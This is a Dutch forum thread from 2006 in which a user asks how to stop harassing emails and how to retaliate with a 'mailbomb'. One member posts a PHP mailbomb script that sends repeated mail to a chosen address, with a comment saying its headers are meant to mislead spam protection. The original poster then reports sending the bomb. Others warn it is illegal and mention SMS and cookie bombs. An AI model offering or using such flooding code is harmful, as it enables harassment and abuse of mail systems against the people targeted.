login  Naam:   Wachtwoord: 
Registreer je!
 Forum

irritante mail ontvangen

Offline Appie_Dijk - 04/04/2006 15:31
Avatar van Appie_DijkLid Hallo iedereen,

ik krijg van een persoon de heletijd irritante mailtjes.
soms wel 10x hetzelfde mailtje op 1 dag.

De mailtjes stuurd deze persoon vanaf verschillende e-mail adressen (wat erg jammer is anders had ik hem gewoon kunnen blokkeren).

Ik heb de persoon ook al meerdere malen gevraagd of hij er eens mee wil stoppen maar kennelijk vind hij het alleen maar leuk (krijg namelijk steeds meer).

Is er een manier waarop ik deze persoon kan blokkeren (metname omdat hij vanaf meerdere mailadressen mailtjes verstuurd)
of als ik hem niet kan blokkeren, kan ik hem op één of andere manier terugpakken??? ik hoorde laatst iets van een mailbom ofzo... wat is dat? lijkt me niet leuk om te ontvangen en ook het laatste wat ik ga proberen maar als t echt neit anders kan doe ik het graag...

iemand suggesties om deze ongewenste/irritante mailtjes tegen te gaan?

12 antwoorden

Gesponsorde links
Offline rutgerp - 04/04/2006 15:34
Avatar van rutgerp HTML interesse hm.., je kan de smtp server blokkeren (check de headers van de email) of een heel domein. anders koop of download een anti-spam filter en stel in als iemand een mail stuurt met de volgende woorden.. stuur hem dan in de spam map

Ik raad aan om outlook te nemen, kan je zoiets bijvoorbeeld doen. (Soms ook bij je provider zoals Hotmail en Tiscali)
Offline timo - 04/04/2006 15:40
Avatar van timo PHP ver gevorderde Thunderbird, is veel beter tegen spam!
Offline vinTage - 04/04/2006 15:42
Avatar van vinTage Nieuw lid Als je weet wie het is, sloop hem dan gewoon 
Offline timo - 04/04/2006 15:51
Avatar van timo PHP ver gevorderde en anders, maak een php script met daarin:
  1. <?php
  2. //////////////////////////////
  3. // Simpel Mailbom script //
  4. // Misbruik is VERBODEN! //
  5. //////////////////////////////
  6. $aantal = 100; // aantal keer dat de mail moet worden verzonden
  7. $email = "naam@domein.ext"; // naar welk email adres moet de bom gaan?
  8. // ff wat headers zodat spam protection word misleid
  9. $headers = "";
  10. $headers .= "MIME-Version: 1.0\r\n";
  11. $headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
  12. $headers .= "CC: ".$email."\r\n"; // en een cc'tje zodat hij de hele bom 2x krijgt
  13. for($i=0; $i<$aantal, $i++;) // een loopje zodat de mail het aantal x dat je hebt opgegeven word verzonden
  14. {
  15. mail($email,"Hej, hoe gaat het?",$headers); // en verzend de mail
  16. }
  17. ?>

stel het mail adres (een vanwaar je het krijgt) in en het aantal en de mailbom is verzonden

// verboden misbruik van te maken
Offline Coolbean - 04/04/2006 15:55
Avatar van Coolbean Nieuw lid ^^ haha een mailbom.
Maar kan je hem niet blokkeren via zen ip,
ik bedoel, als je zen ip weet te krijgen, zal er toch een manier zijn om hem te blokkeren.
Offline rutgerp - 04/04/2006 15:57
Avatar van rutgerp HTML interesse Nee, ten 1e: zijn ip wordt niet meegezonden
ten 2e: hackers/spammers zouden dan een proxy en/of een dynamisch ip gebruiken. Je kan natuurlijk ook een nieuw emailadres aanmaken. En zoals ik al zij: block de emails met bepaalde woorden zoals "koop" enzo...
Offline Appie_Dijk - 04/04/2006 16:32
Avatar van Appie_Dijk Lid thnx, wou idd zijn ip blokken maar dat omzeilt hij ook... heb mailbom gestuurd... thnx

dit keer noem ik het namelijk geen misbruik 
Offline Thomas - 04/04/2006 16:34 (laatste wijziging 04/04/2006 16:35)

Zul je zien dat je door jouw ISP wordt afgesloten omdat je aan het spammen bent... Of je hosting wordt opgeschort...
Offline ece - 04/04/2006 16:45
Avatar van ece HTML interesse Juist.
In feiten is het illegaal wat je doet.
Offline Sitefoon - 04/04/2006 17:01
Avatar van Sitefoon Nieuw lid ik stuur ook wel es een mailbom van 50 mailtjes naar m'n vrienden (als die dat ook naar mij doen) en ik heb nog nooit een waarschuwing of zo gehad, maar bij mij geeft hij een error als ik het limit van 150 mailtjes per dag passeer!

maar goed mailbom, dan weet ik er nog 2:

cookiebom en smsbom

die laatste is wel erg gemeen omdat hierdoor je telefoon kan worden geblokt als je veel krijgt en als je telefoon niet geblokt word moet je al die sms'jes gaan verwijderen (dat zijn ongeveer 300 knopjes!)

en een cookie bom gooit je computer vol zeker als je lekker veel in de cookie laat zetten.

maar goed, doe dat maar niet, het is inderdaad illegaal, maar ik denk dat als hij/zij je aanklaagt voor overlast, hij zelf ook in de purree zit!:p
Offline ikkedikke - 04/04/2006 18:05
Avatar van ikkedikke PHP expert ik zal je even uit je droom helpen van je cookies, je kan er namelijk maar 20 cookies zetten met iedere 4 kb aan info.
wat betreft die smsjes: ook een duur grapje als je 10 cent per smsje betaalt. bovendien heeft mijn telefoon een knopje "wis alle berichten"

als je even de headers van het mailtje dumpt kan je/kunnen we iig het ip van die proxy vinden en een abusemailtje sturen.

Offline kokx - 04/04/2006 18:09
Avatar van kokx Onbekend Wat voor adressen heeft hij/zij allemaal. (hotmail, gmail). Want hotmail stuurt de ip adressen van iemand wel mee in de headers.
Gesponsorde links
Dit onderwerp is gesloten.
Actieve forumberichten
© 2002-2024 Sitemasters.be - Regels - Laadtijd: 0.196s